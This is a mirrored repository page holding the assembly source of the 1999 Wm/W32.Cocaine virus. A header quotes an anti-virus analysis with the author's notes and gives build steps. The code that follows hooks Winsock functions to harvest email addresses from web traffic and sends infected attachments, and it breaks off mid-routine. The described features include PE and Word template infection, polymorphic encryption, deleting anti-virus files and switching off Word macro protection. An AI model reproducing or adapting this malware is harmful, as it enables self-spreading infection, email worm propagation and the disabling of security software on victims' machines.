mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-02-27 16:54:47 +00:00
5768 lines
192 KiB
NASM
5768 lines
192 KiB
NASM
![]() |
;Wm/W32.Cocaine - 22231 bytes
|
|||
|
;(c) Vecna 1999
|
|||
|
;
|
|||
|
;This virus infect PE and DOC files.
|
|||
|
;
|
|||
|
;Study the code and the AVPVE description for others features.
|
|||
|
;
|
|||
|
;Small corrections in AVPVE text are between []'s
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;AVPVE Description:
|
|||
|
;
|
|||
|
; Cocaine
|
|||
|
;
|
|||
|
; ------------------------------------------------------------------------
|
|||
|
; This is a parasitic Windows PE files and MS Word normal templates infector
|
|||
|
; with email spreading ability, about 22Kb of length. The virus has three
|
|||
|
; instances: in Windows PE EXE files, in Word NORMAL template and as attached
|
|||
|
; file in email messages.
|
|||
|
;
|
|||
|
; The virus code in infected PE EXE files is its main instance. When it is
|
|||
|
; executed, the virus searches for PE EXE files in the current and Windows
|
|||
|
; directories and infects them. The virus also drops infected an NORMAL.DOT
|
|||
|
; to the MS Word directory from its PE EXE instance, as well as sends
|
|||
|
; infected emails. The virus instance in the NORMAL template drops and
|
|||
|
; executes the infected PE EXE file on each document closing, and is not able
|
|||
|
; to infect other documents and templates. [* Wrong. Check the infected doc I
|
|||
|
; included, or the file MACRO.INC for the code *] The virus code in emails
|
|||
|
; appears as attached file that is infected an PE EXE Windows executable file
|
|||
|
; with a random name, or infected NORMAL template.
|
|||
|
;
|
|||
|
; The virus is per-process memory resident. This means that the virus copy
|
|||
|
; may stay in memory for a long time until the infected application
|
|||
|
; terminates. In case only "short-life" applications are infected, the virus
|
|||
|
; code is not present in the system memory for long time. In case an
|
|||
|
; application in permanent use is infected, the virus is active during a long
|
|||
|
; time, hooks Windows functions, infects PE EXE files that are accessed and
|
|||
|
; sends email messages.
|
|||
|
;
|
|||
|
; The virus is polymorphic in PE files as well as in Word NORMAL template.
|
|||
|
; The virus has two polymorphic engines in its EXE code: the first of them
|
|||
|
; generates polymorphic decryption loop in infected PE EXE files, the second
|
|||
|
; one makes the virus macro program in infected NORMAL.DOT polymorphic too.
|
|||
|
;
|
|||
|
; The virus has a payload routine that is executed when an infected file is
|
|||
|
; run after four months when it was infected. [* 8 months... Maybe AAM 12
|
|||
|
; confused AVers ;-) *] This routine displays message boxes that have the
|
|||
|
; header "W32/Wm.Cocaine" and the text that is randomly selected from seven
|
|||
|
; variants:
|
|||
|
;
|
|||
|
; Your life burn faster, obey your master...
|
|||
|
; Chop your breakfast on a mirror...
|
|||
|
; Veins that pump with fear, sucking darkest clear...
|
|||
|
; Taste me you will see, more is all you need...
|
|||
|
; I will occupy, I will help you die...
|
|||
|
; I will run through you, now I rule you too...
|
|||
|
; Master of Puppets, I'm pulling your strings...
|
|||
|
;
|
|||
|
; The virus pays attention to anti-virus programs and tries to disable them.
|
|||
|
; Each time an infected file is executed and virus installs its per-process
|
|||
|
; resident copy it looks for anti-virus data files in the current directory
|
|||
|
; and deletes them. The names of these files look like follows: KERNEL.AVC,
|
|||
|
; SIGN.DEF, FIND.DRV, NOD32.000, DSAVIO32.DLL, SCAN.DAT, VIRSCAN.DAT (AVP,
|
|||
|
; DSAV, NOD, SCAN and other anti-virus data files). The virus also locates
|
|||
|
; and terminates old version of AVP Monitor on-access scanner. [* Not so
|
|||
|
; old ;-) *]
|
|||
|
;
|
|||
|
; The known virus version has bugs and cannot spread from Word macro instance
|
|||
|
; to Windows executable. It also has a bug in PE EXE infection routine and
|
|||
|
; corrupts some WinNT executable files. [* What can I say... is buggy :-) *]
|
|||
|
;
|
|||
|
; The virus has a "copyright" text:
|
|||
|
;
|
|||
|
; (c) Vecna
|
|||
|
;
|
|||
|
; Some virus routines (especially macro ones) are related to the "Fabi"
|
|||
|
; multi-platform virus, and some infected files may be detected by the name
|
|||
|
; of this virus. [* Probably, the loader, before it load the poly virus code,
|
|||
|
; can be detected as Fabi *]
|
|||
|
;
|
|||
|
; Technical details
|
|||
|
;
|
|||
|
; The virus has quite large size for a program written in Assembler - about
|
|||
|
; 22Kb, and has many routines that are quite interesting from a technical
|
|||
|
; point of view.
|
|||
|
;
|
|||
|
; Running infected EXE
|
|||
|
;
|
|||
|
; When an infected file takes control the polymorphic decryption loops are
|
|||
|
; executed. They decrypt the virus code layer-by-layer (the virus is
|
|||
|
; encrypted by several loops - from two till five) and pass control to the
|
|||
|
; virus installation routine. It is necessary to note that several virus
|
|||
|
; blocks stay still encrypted. The virus decrypts and accesses them in case
|
|||
|
; of need, and then encrypts back. These blocks are MS Word infection data
|
|||
|
; and routine as well as PE EXE polymorphic engine.
|
|||
|
;
|
|||
|
; The virus installation routine looks for necessary Windows API functions
|
|||
|
; addresses that are used by the virus later. The list of these functions is
|
|||
|
; quite long, this is caused by list of things the virus does to spread
|
|||
|
; itself. The functions list the virus looks for is below:
|
|||
|
;
|
|||
|
; Exported by Functions list
|
|||
|
; ----------- --------------
|
|||
|
; KERNEL32.DLL: GetProcAddress GetModuleHandleA CreateProcessA
|
|||
|
; CreateFileA WinExec CloseHandle LoadLibraryA FreeLibrary
|
|||
|
; CreateFileMappingA MapViewOfFile UnmapViewOfFile
|
|||
|
; FindFirstFileA FindNextFileA FindClose SetEndOfFile
|
|||
|
; VirtualAlloc VirtualFree GetSystemTime
|
|||
|
; GetWindowsDirectoryA GetSystemDirectoryA
|
|||
|
; GetCurrentDirectoryA SetFileAttributesA SetFileTime
|
|||
|
; ExitProcess GetCurrentProcess WriteProcessMemory WriteFile
|
|||
|
; DeleteFileA Sleep CreateThread GetFileSize SetFilePointer
|
|||
|
; USER32.DLL: MessageBoxA FindWindowA PostMessageA
|
|||
|
; ADVAPI32: RegSetValueExA RegCreateKeyExA RegOpenKeyExA
|
|||
|
; RegQueryValueExA RegCloseKey
|
|||
|
; MAPI32.DLL: MAPISendMail
|
|||
|
;
|
|||
|
; The virus gets these functions' addresses by the standard Windows virus
|
|||
|
; trick: it locates the image on KERNEL32.DLL in the Windows memory, scans
|
|||
|
; its Export table and gets addresses of two functions: GetModuleHandle and
|
|||
|
; GetProcAddress [* The import table is searched while infecting a file for
|
|||
|
; GetModuleHandle *]. By using these two functions the virus is then able
|
|||
|
; easily locate all addresses of other necessary functions. The most
|
|||
|
; interesting feature of this routine is: this is the first virus that processes
|
|||
|
; not only Win95/98 and WinNT addresses while looking for KERNEL32.DLL image,
|
|||
|
; but pays attention for Win2000 addresses also [* If the host dont import
|
|||
|
; GetModuleHandle this is *]
|
|||
|
;
|
|||
|
; The virus then locates and infects the MS Word, then searches for PE EXE
|
|||
|
; files and also infects them, then hooks a set of system events (files and
|
|||
|
; emails access) that is used to locate and infect more files as well as
|
|||
|
; spread virus copy to the Internet in attached emails.
|
|||
|
;
|
|||
|
; Infecting MS Word
|
|||
|
;
|
|||
|
; The very first infection routine that is activated by the virus is its MS
|
|||
|
; Word affecting routine, if it is installed in the system. First of all here
|
|||
|
; the virus checks for C:\ANCEV.SYS file presence.
|
|||
|
;
|
|||
|
; The C:\ANCEV.SYS file ("ANCEV"="VECNA" written backward) has a special
|
|||
|
; purpose. This file is created when the MS Word template infection routine
|
|||
|
; completes. So, this file presence means that MS Word was located and
|
|||
|
; NORMAL.DOT template was infected. In this case the virus while sending
|
|||
|
; emails sends NORMAL.DOT template but not the infected EXE dropper [* I used
|
|||
|
; to think that DOC files are less suspicious to send by email, but, after
|
|||
|
; melissa's shits, EXE are better i gues *]
|
|||
|
;
|
|||
|
; So, the virus checks for this file at the very top of MS Word infection
|
|||
|
; routine. If it does not exist, the virus continues infection. If this file
|
|||
|
; is found, the virus randomly in one cases of ten continues infection, and
|
|||
|
; in nine cases of ten leaves infection routine. This means that in one case
|
|||
|
; of ten the MS Word NORMAL.DOT will be re-infected anyway [* This is done to
|
|||
|
; avoid lamers creating a fake ANCEV.SYS to not have WinWord infected *].
|
|||
|
;
|
|||
|
; The virus then disables the Word VirusWarning protection by modifying the
|
|||
|
; system registry keys where Word stores its settings:
|
|||
|
;
|
|||
|
; SOFTWARE\Microsoft\Office\8.0\Word\Options, EnableMacroVirusProtection
|
|||
|
;
|
|||
|
; The virus then gets Word's templates directory also by reading system
|
|||
|
; registry:
|
|||
|
;
|
|||
|
; SOFTWARE\Microsoft\Office\8.0\Common\FileNew\LocalTemplates
|
|||
|
;
|
|||
|
; and deletes the NORMAL.DOT template in there, and then creates a new
|
|||
|
; NORMAL.DOT template file - infected one. The infected NORMAL.DOT contains a
|
|||
|
; small macro inside. This macro has "AutoExec" Word auto-name - it will be
|
|||
|
; automatically executed on next Word startup and will import the main virus
|
|||
|
; macro from the C:\COCAINE.SYS file.
|
|||
|
;
|
|||
|
; The C:\COCAINE.SYS file is created by the virus just after overwriting the
|
|||
|
; NORMAL.DOT template. This SYS file is a text file that contains VBA
|
|||
|
; program's source code. This source is extracted by the virus from its code,
|
|||
|
; mixed with junk (polymorphic) VBA instructions and appended by infected PE
|
|||
|
; EXE dropper converted to ASCII strings.
|
|||
|
;
|
|||
|
; So, the MS Word infection routine does its work in two steps. First of all
|
|||
|
; the virus replaces the original NORMAL.DOT with a new one that contains the
|
|||
|
; "AutoExec" macro program (loader) that imports complete virus code from the
|
|||
|
; C:\COCAINE.SYS file, and completes by that porting virus code from PE EXE
|
|||
|
; file to MS Word template.
|
|||
|
;
|
|||
|
; From Word to EXE
|
|||
|
;
|
|||
|
; To drop the PE EXE file from its Word template instance the virus uses a
|
|||
|
; standard macro-viruses' trick. It creates two files: the first of them is
|
|||
|
; the C:\COCAINE.SRC file with infected PE EXE file image converted to ASCII
|
|||
|
; form, and second file is a DOS batch with random name. This batch file
|
|||
|
; contains a set of instructions that execute the DOS DEBUG utility that
|
|||
|
; converts ASCII dump back to binary PE EXE form, and executes it [* This is
|
|||
|
; the worst imaginable way to drop a EXE file ever *]
|
|||
|
;
|
|||
|
; So the virus jumps to Windows out of infected Word template.
|
|||
|
;
|
|||
|
; Infecting PE EXE files
|
|||
|
;
|
|||
|
; When MS Word is affected, the virus goes to PE EXE files infection routine.
|
|||
|
; The virus looks for PE EXE files in the current and Windows directories and
|
|||
|
; infects them. The only files infected are those that have .EXE or .SCR
|
|||
|
; filename extensions.
|
|||
|
;
|
|||
|
; The virus then looks for installed browser and mailer and infects them too.
|
|||
|
; The virus locates them by system registry keys in HKEY_LOCAL_MACHINE
|
|||
|
; storage:
|
|||
|
;
|
|||
|
; SOFTWARE\Classes\htmlfile\shell\open\command
|
|||
|
; SOFTWARE\Classes\mailto\shell\open\command
|
|||
|
;
|
|||
|
; The virus needs these files to be infected for activating its Internet
|
|||
|
; infection routines. When these Internet accessing applications are
|
|||
|
; infected, the virus copy is active in the memory for a long time exactly at
|
|||
|
; the moment a user is connected to the Internet. This is necessary to the
|
|||
|
; virus to realize its Internet spreading ability.
|
|||
|
;
|
|||
|
; PE EXE Infection mechanism
|
|||
|
;
|
|||
|
; The virus checks several conditions before infecting the file. 1st: the
|
|||
|
; file length has to be not divisible by 101 (it is virus protection to avoid
|
|||
|
; multiple infection, the already infected PE EXE files have such length).
|
|||
|
; 2nd: when the virus looks for EXE files in the current and Windows
|
|||
|
; directories to infect them, the name of the file cannot contain 'V' letter
|
|||
|
; or digits, here the virus avoids most popular anti-virus scanners and "goat
|
|||
|
; files" infection.
|
|||
|
;
|
|||
|
; If the first section has big enough size (more than 2304 bytes), the virus
|
|||
|
; writes to there several blocks of junk code that passes the control
|
|||
|
; block-by-block to the main virus decryption loops. There are eight blocks
|
|||
|
; written to files when the virus infects them:
|
|||
|
;
|
|||
|
; +------------+
|
|||
|
; | |
|
|||
|
; |PE Header | ---------------+
|
|||
|
; +------------+ |
|
|||
|
; | +-----+<-+| |
|
|||
|
; | |Junk2| || |
|
|||
|
; | +-----+-+|| Entry Point |
|
|||
|
; |+-----+ |||<---------------+
|
|||
|
; ||Junk1| |||
|
|||
|
; |+-----+----+|
|
|||
|
; | | |
|
|||
|
; |+-----+<--+ |
|
|||
|
; ||Junk3| |
|
|||
|
; |+-----+----+|
|
|||
|
; | V|
|
|||
|
; | . . . |
|
|||
|
; | +-----+|
|
|||
|
; |+----|Junk8||
|
|||
|
; || +-----+|
|
|||
|
; |V |
|
|||
|
; |------------|
|
|||
|
; |Virus code |
|
|||
|
; | |
|
|||
|
; +------------+
|
|||
|
;
|
|||
|
; In this case the virus does not modify program's entry point address, but
|
|||
|
; it needs to restore all overwritten blocks of host file before return
|
|||
|
; control to original entry procedure [* CommanderBomber/OneHalf rulez *].
|
|||
|
;
|
|||
|
; If the first section is short, the control goes directly to virus code. In
|
|||
|
; this case the virus modifies program's entry address to get control when
|
|||
|
; infected files are executed.
|
|||
|
;
|
|||
|
; The virus code itself is encrypted by several (from two till five)
|
|||
|
; polymorphic loops. The polymorphic engine in the virus is quite strong, and
|
|||
|
; produces about 2Kb of polymorphic loops [* This poly is kewl *]
|
|||
|
;
|
|||
|
; The virus also patches the Import section to get functions GetProcAddress,
|
|||
|
; GetModuleHandle, CreateProcessA, WinExec and MAPISendMail when infection
|
|||
|
; executable is run.
|
|||
|
;
|
|||
|
; After all the virus writes its encrypted code to the end of last file
|
|||
|
; section, and increases section size by patching PE header.
|
|||
|
;
|
|||
|
; Intercepting Events
|
|||
|
;
|
|||
|
; When the Word and PE EXE direct infection routines are complete, the virus
|
|||
|
; hooks several Windows functions and stays in Windows memory as part of the
|
|||
|
; host program. The virus hooks two file access function WinExec and
|
|||
|
; CreateProcessA, if they are imported by the host program from the
|
|||
|
; KERNEL32.DLL. When these functions get control (a program is executed) the
|
|||
|
; virus gets the program's file name, gets its directory, searches and
|
|||
|
; infects PE EXE files in this directory.
|
|||
|
;
|
|||
|
; Sending Emails
|
|||
|
;
|
|||
|
; The virus per-process resident code also runs email infection thread, hooks
|
|||
|
; MAPISendMail that is exported from MAPI32.DLL, "connect" and "recv" from
|
|||
|
; WSOCK32.DLL and GetProcAddress from KERNEL32.DLL.
|
|||
|
;
|
|||
|
; The first hook is used by the virus to send its copy to the Internet. When
|
|||
|
; the virus intercepts this event it looks for attached data in the message.
|
|||
|
; If there is no attach, the virus appends to the message infected NORMAL.DOT
|
|||
|
; or infected PE EXE file (the latter is created on the disk in the
|
|||
|
; C:\ENIACOC.SYS file).
|
|||
|
;
|
|||
|
; The "GetProcAddress", "connect" and "recv" hooks are used by the virus to
|
|||
|
; realize second method of infected Emails sending. When a message arrives,
|
|||
|
; the virus scans its header for "mailto:" field, gets the address from there
|
|||
|
; and stores it in its own database. [* MAILTO: is a HTML command/instruction
|
|||
|
; used very often. Nice idea :-) *]
|
|||
|
;
|
|||
|
; When taking control the infection thread looks for email address caught by
|
|||
|
; "connect" and "recv" hooks, calculates its CRC and compares with its
|
|||
|
; "already infected addresses" database that is stored in the BRSCBC.DAT file
|
|||
|
; in the Windows system directory. If this address was not used yet, the
|
|||
|
; virus adds it to its BRSCBC.DAT database, creates a message with NORMAL
|
|||
|
; template or infected PE EXE file, and sends it by using MAPISendMail
|
|||
|
; function [* Why BRSCBC? ;-) *]. The subject field for the message is
|
|||
|
; randomly selected from variants:
|
|||
|
;
|
|||
|
; Kewl page!
|
|||
|
; Improvement to your page
|
|||
|
; Your page r0x0r!
|
|||
|
; You must see this...
|
|||
|
; Secret stuff!
|
|||
|
; [* or a empty subject line *]
|
|||
|
;
|
|||
|
; By using the BRSCBC.DAT database the virus avoids duplicate sendings, but
|
|||
|
; on each infected program run the virus depending on its random counter
|
|||
|
; deletes this file, and clears "do-not-send" database by that.
|
|||
|
;
|
|||
|
; The "GetProcAddress" that is also hooked by virus TSR copy is used only to
|
|||
|
; intercept "connect" and "recv" WSOCK32.DLL functions, if an application
|
|||
|
; does not import these routines "by default", but activates them in case of
|
|||
|
; need. To do that the "GetProcAddress" virus' hook intercepts accesses to
|
|||
|
; "connect" and "recv" WSOCK32.DLL functions' addresses. If an application
|
|||
|
; tries to get addresses of these routines to use Internet connections, the
|
|||
|
; virus returns addresses of its own "connect" and "recv" hookers, and so
|
|||
|
; intercepts Internet connection [* Fucking OPERA *]
|
|||
|
|
|||
|
;Thnz to IkX for accepting this contribution
|
|||
|
|
|||
|
;Greetz to Z0MBiE, VirusBuster and Reptile(the first to use macro autoload)
|
|||
|
|
|||
|
;Special greetz goes to Jacky Qwerty:
|
|||
|
;Los virus no serian lo que son hoy si no fuera por vos!
|
|||
|
;THNDV/CAP/Cabanas RULEZ! (THNDV solo para los mas vivos ;> )
|
|||
|
|
|||
|
;Big fuckZ to T2000 and El Gusano Boliviano: lamers and ripperz!!!!
|
|||
|
|
|||
|
;Greetz to all creative coders
|
|||
|
|
|||
|
;Use the pre-compiled virus, but if you're a sort of 37337 d00d... to compile:
|
|||
|
; TASM /M /ML COKE.ASM
|
|||
|
; TLINK32 COKE,,,IMPORT32
|
|||
|
; PEWRSEC COKE.EXE
|
|||
|
;Remember to split the big COKE.ASM in the smaller incz before!
|
|||
|
;(and beware the trap ;> )
|
|||
|
|
|||
|
;contacts: vecna_br@hotmail.com (except questions about compiling)
|
|||
|
|
|||
|
.586p
|
|||
|
.model flat, STDCALL
|
|||
|
locals
|
|||
|
|
|||
|
include host.inc
|
|||
|
|
|||
|
ofs equ offset
|
|||
|
by equ byte ptr
|
|||
|
wo equ word ptr
|
|||
|
dwo equ dword ptr
|
|||
|
|
|||
|
TRUE EQU 1
|
|||
|
FALSE EQU 0
|
|||
|
|
|||
|
MAIL_DEBUG EQU FALSE
|
|||
|
|
|||
|
DIRECT EQU TRUE
|
|||
|
|
|||
|
MONTH_DELAY EQU 8
|
|||
|
|
|||
|
MAX_BRANCH EQU 8 ;beware DrWeb! (5 here=detect!)
|
|||
|
|
|||
|
MAX_M_DEEP EQU 6
|
|||
|
|
|||
|
MAIL_PRIORITY EQU 10 ;seconds
|
|||
|
|
|||
|
MAX_SOCK EQU 10
|
|||
|
|
|||
|
DIV_VALUE EQU 101
|
|||
|
|
|||
|
MAX_PATH EQU 260
|
|||
|
|
|||
|
MIN_RAW EQU (MAX_BRANCH+1)*100h
|
|||
|
|
|||
|
vsize equ vend - vcode
|
|||
|
|
|||
|
msize equ mend - vcode
|
|||
|
|
|||
|
_VSEG segment dword use32 public 'COCAINE'
|
|||
|
|
|||
|
IFNDEF I_AM_IDIOT_USER_THAT_CANT_COMPILE
|
|||
|
|
|||
|
vcode label
|
|||
|
|
|||
|
db '(c) Vecna', 0
|
|||
|
|
|||
|
FunDate db 0 ;month to activate
|
|||
|
|
|||
|
InitWSOCK proc
|
|||
|
call @@1
|
|||
|
wsock32 db 'WSOCK32.DLL', 0
|
|||
|
@@1:
|
|||
|
call [ebp+(ofs _GetModuleHandle-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz @@0
|
|||
|
call @@2
|
|||
|
db 'connect',0
|
|||
|
@@2:
|
|||
|
push eax
|
|||
|
call @@3
|
|||
|
db 'recv', 0
|
|||
|
@@3:
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _GetProcAddress-ofs vcode)]
|
|||
|
mov [ebp+(ofs _recv-ofs vcode)], eax
|
|||
|
call [ebp+(ofs _GetProcAddress-ofs vcode)]
|
|||
|
mov [ebp+(ofs _connect-ofs vcode)], eax
|
|||
|
clc
|
|||
|
ret
|
|||
|
@@0:
|
|||
|
stc
|
|||
|
ret
|
|||
|
InitWSOCK endp
|
|||
|
|
|||
|
http_install proc
|
|||
|
sub ecx, ecx
|
|||
|
call @@set_seh
|
|||
|
mov esp, [esp+8]
|
|||
|
call delta
|
|||
|
jmp @@fault
|
|||
|
@@set_seh:
|
|||
|
push dwo fs:[ecx]
|
|||
|
mov fs:[ecx], esp
|
|||
|
call InitWSOCK
|
|||
|
jc @@fault
|
|||
|
mov ebx, [ebp+(ofs _base-ofs vcode)]
|
|||
|
@@check:
|
|||
|
cmp wo [ebx], 'ZM'
|
|||
|
je @@found
|
|||
|
@@fault:
|
|||
|
sub ecx, ecx
|
|||
|
pop dwo fs:[ecx]
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
@@found:
|
|||
|
mov edi, [ebx+3ch]
|
|||
|
lea edi, [ebx+edi+128]
|
|||
|
mov edi, [edi]
|
|||
|
@@2:
|
|||
|
mov esi, [ebx+edi+12]
|
|||
|
test esi, esi
|
|||
|
jz @@ret
|
|||
|
add esi, ebx
|
|||
|
lodsd
|
|||
|
or eax, 20202020h
|
|||
|
cmp eax, 'cosw'
|
|||
|
je @@wsock
|
|||
|
add edi, 20
|
|||
|
jmp @@2
|
|||
|
@@wsock:
|
|||
|
mov esi, [ebx+edi+16]
|
|||
|
add esi, ebx
|
|||
|
@@searchloop:
|
|||
|
lodsd
|
|||
|
test eax, eax
|
|||
|
jz @@ret
|
|||
|
cmp eax, [ebp+(ofs _connect-ofs vcode)]
|
|||
|
jne @@3
|
|||
|
lea eax, [ebp+(ofs New_connect-ofs vcode)]
|
|||
|
lea edi, [esi-4]
|
|||
|
mov ecx, 4
|
|||
|
push esi
|
|||
|
push eax
|
|||
|
mov esi, esp ;fake buffer in stack
|
|||
|
call WriteMem
|
|||
|
pop esi
|
|||
|
pop esi
|
|||
|
@@3:
|
|||
|
cmp eax, [ebp+(ofs _recv-ofs vcode)]
|
|||
|
jne @@searchloop
|
|||
|
lea eax, [ebp+(ofs New_recv-ofs vcode)]
|
|||
|
lea edi, [esi-4]
|
|||
|
mov ecx, 4
|
|||
|
push esi
|
|||
|
push eax
|
|||
|
mov esi, esp ;fake buffer in stack
|
|||
|
call WriteMem
|
|||
|
pop esi
|
|||
|
pop esi
|
|||
|
@@ret:
|
|||
|
jmp @@fault
|
|||
|
http_install endp
|
|||
|
|
|||
|
NewGetProcAddress proc
|
|||
|
push esp
|
|||
|
pushad
|
|||
|
call delta
|
|||
|
mov eax, [ebp+(ofs _GetProcAddress-ofs vcode)]
|
|||
|
mov [esp+(7*4)+4], eax
|
|||
|
call InitWSOCK
|
|||
|
jc @@1
|
|||
|
lea eax, [ebp+(ofs wsock32-ofs vcode)]
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _GetModuleHandle-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz @@1
|
|||
|
cmp [esp+(7*4)+12], eax
|
|||
|
jnz @@1
|
|||
|
lea eax, [ebp+(ofs CheckWSOCK32-ofs vcode)]
|
|||
|
xchg [esp+(7*4)+8], eax
|
|||
|
mov [ebp+(ofs wsock_ret-ofs vcode)], eax
|
|||
|
@@1:
|
|||
|
popad
|
|||
|
ret
|
|||
|
NewGetProcAddress endp
|
|||
|
|
|||
|
CheckWSOCK32 proc
|
|||
|
push ebp
|
|||
|
call delta
|
|||
|
cmp eax, [ebp+(ofs _connect-ofs vcode)]
|
|||
|
jne @@1
|
|||
|
lea eax, [ebp+(ofs New_connect-ofs vcode)]
|
|||
|
jmp @@2
|
|||
|
@@1:
|
|||
|
cmp eax, [ebp+(ofs _recv-ofs vcode)]
|
|||
|
jne @@2
|
|||
|
lea eax, [ebp+(ofs New_recv-ofs vcode)]
|
|||
|
@@2:
|
|||
|
pop ebp
|
|||
|
push 12345678h
|
|||
|
wsock_ret equ dwo $-4
|
|||
|
ret
|
|||
|
CheckWSOCK32 endp
|
|||
|
|
|||
|
New_connect proc
|
|||
|
push esp
|
|||
|
pushad
|
|||
|
call delta
|
|||
|
mov eax, [ebp+(ofs _connect-ofs vcode)]
|
|||
|
mov [esp+(7*4)+4], eax
|
|||
|
mov esi, [esp+(7*4)+16]
|
|||
|
mov ax, wo [esi+2] ;port number
|
|||
|
cmp ax, 5000h ;80
|
|||
|
jne @@1
|
|||
|
mov eax, [esp+(7*4)+12] ;get socket
|
|||
|
mov ebx, [ebp+(ofs _socket-ofs vcode)]
|
|||
|
mov [ebp+(ofs socket-ofs vcode)+(ebx*4)], eax
|
|||
|
inc ebx
|
|||
|
cmp ebx, MAX_SOCK
|
|||
|
jne @@2
|
|||
|
sub ebx, ebx
|
|||
|
@@2:
|
|||
|
mov [ebp+(ofs _socket-ofs vcode)], ebx
|
|||
|
@@1:
|
|||
|
popad
|
|||
|
ret
|
|||
|
New_connect endp
|
|||
|
|
|||
|
delta proc
|
|||
|
call @@1
|
|||
|
@@1:
|
|||
|
pop ebp
|
|||
|
sub ebp, (ofs @@1-ofs vcode)
|
|||
|
ret
|
|||
|
delta endp
|
|||
|
|
|||
|
New_recv proc
|
|||
|
push esp
|
|||
|
pushad
|
|||
|
call delta
|
|||
|
mov eax, [ebp+(ofs _recv-ofs vcode)]
|
|||
|
mov [esp+(7*4)+4], eax
|
|||
|
mov eax, [esp+(7*4)+12]
|
|||
|
|
|||
|
lea edi, [ebp+(ofs socket-ofs vcode)]
|
|||
|
mov ecx, MAX_SOCK
|
|||
|
repne scasd
|
|||
|
jecxz @@1
|
|||
|
|
|||
|
mov eax, [esp+(7*4)+16]
|
|||
|
mov [ebp+(ofs recv_buff-ofs vcode)], eax
|
|||
|
mov eax, [esp+(7*4)+20]
|
|||
|
mov [ebp+(ofs recv_size-ofs vcode)], eax
|
|||
|
lea eax, [ebp+(ofs New_recv2-ofs vcode)]
|
|||
|
xchg [esp+(7*4)+8], eax
|
|||
|
mov [ebp+(ofs recv_ret-ofs vcode)], eax
|
|||
|
@@1:
|
|||
|
popad
|
|||
|
ret
|
|||
|
New_recv endp
|
|||
|
|
|||
|
New_recv2 proc
|
|||
|
pushad
|
|||
|
call delta
|
|||
|
mov eax, [ebp+(ofs email_w-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jnz @@0
|
|||
|
mov esi, [ebp+(ofs recv_buff-ofs vcode)]
|
|||
|
mov ecx, [ebp+(ofs recv_size-ofs vcode)]
|
|||
|
sub ecx, 8
|
|||
|
@@1:
|
|||
|
push ecx
|
|||
|
push esi
|
|||
|
lodsd
|
|||
|
or eax, 20202000h
|
|||
|
cmp eax, 'iam"'
|
|||
|
jne @@2
|
|||
|
lodsd
|
|||
|
or eax, 00202020h
|
|||
|
cmp eax, ':otl'
|
|||
|
jne @@2
|
|||
|
lea edi, [ebp+(ofs email-ofs vcode)]
|
|||
|
lea ebx, [edi+127]
|
|||
|
@@4:
|
|||
|
lodsb
|
|||
|
cmp al, '"'
|
|||
|
je @@3
|
|||
|
cmp al, '?'
|
|||
|
je @@3
|
|||
|
cmp edi, ebx
|
|||
|
je @@3
|
|||
|
stosb
|
|||
|
jmp @@4
|
|||
|
@@3:
|
|||
|
sub eax, eax
|
|||
|
stosb
|
|||
|
dec eax
|
|||
|
mov dwo [ebp+(ofs email_w-ofs vcode)], eax
|
|||
|
@@2:
|
|||
|
pop esi
|
|||
|
inc esi
|
|||
|
pop ecx
|
|||
|
loop @@1
|
|||
|
@@0:
|
|||
|
popad
|
|||
|
push 12345678h
|
|||
|
recv_ret equ dwo $-4
|
|||
|
ret
|
|||
|
New_recv2 endp
|
|||
|
|
|||
|
MailThread proc
|
|||
|
cld
|
|||
|
mov ebp, [esp+4]
|
|||
|
sub eax, eax
|
|||
|
call @@set_seh
|
|||
|
mov esp, [esp+8]
|
|||
|
call delta
|
|||
|
push -1
|
|||
|
call [ebp+(ofs _Sleep-ofs vcode)]
|
|||
|
@@set_seh:
|
|||
|
push dwo fs:[eax]
|
|||
|
mov fs:[eax], esp
|
|||
|
@@main_loop:
|
|||
|
mov ecx, [ebp+(ofs email_w-ofs vcode)]
|
|||
|
test ecx, ecx
|
|||
|
jz @@no_queued
|
|||
|
|
|||
|
lea esi, [ebp+(ofs email-ofs vcode)]
|
|||
|
|
|||
|
push esi
|
|||
|
sub ecx, ecx
|
|||
|
cld
|
|||
|
@@1strlen:
|
|||
|
lodsb
|
|||
|
test al, al
|
|||
|
jz @@2strlen
|
|||
|
inc ecx
|
|||
|
jmp @@1strlen
|
|||
|
@@2strlen:
|
|||
|
mov edi, ecx
|
|||
|
pop esi
|
|||
|
|
|||
|
call CRC32
|
|||
|
mov [ebp+(ofs email_crc-ofs vcode)], eax
|
|||
|
|
|||
|
call CheckList
|
|||
|
test eax, eax
|
|||
|
jnz @@done
|
|||
|
|
|||
|
IF MAIL_DEBUG EQ TRUE
|
|||
|
sub ecx, ecx
|
|||
|
push 4 ;yes/no
|
|||
|
lea eax, [ebp+(ofs title1-ofs vcode)]
|
|||
|
push eax
|
|||
|
lea eax, [ebp+(ofs email-ofs vcode)]
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
call [ebp+(ofs _MessageBoxA-ofs vcode)]
|
|||
|
cmp eax, 7 ;no!
|
|||
|
je @@done
|
|||
|
ENDIF
|
|||
|
|
|||
|
lea eax, [ebp+(ofs mapi-ofs vcode)]
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _LoadLibraryA-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz @@done
|
|||
|
|
|||
|
mov [ebp+(ofs _mapi-ofs vcode)], eax
|
|||
|
|
|||
|
lea ecx, [ebp+(ofs sMAPISendMail-ofs vcode)]
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _GetProcAddress-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz @@unload_mapi
|
|||
|
|
|||
|
mov [ebp+(ofs _MAPISendMail-ofs vcode)], eax
|
|||
|
|
|||
|
call OpenAncev
|
|||
|
jc @@file ;file dont exists, binary send
|
|||
|
@@doc:
|
|||
|
call GetTemplateDir
|
|||
|
@@1:
|
|||
|
lodsb
|
|||
|
test al, al
|
|||
|
jnz @@1
|
|||
|
lea edi, [esi-1]
|
|||
|
lea esi, [ebp+(ofs ndot-ofs vcode)]
|
|||
|
@@3:
|
|||
|
lodsb
|
|||
|
stosb
|
|||
|
test al, al
|
|||
|
jnz @@3
|
|||
|
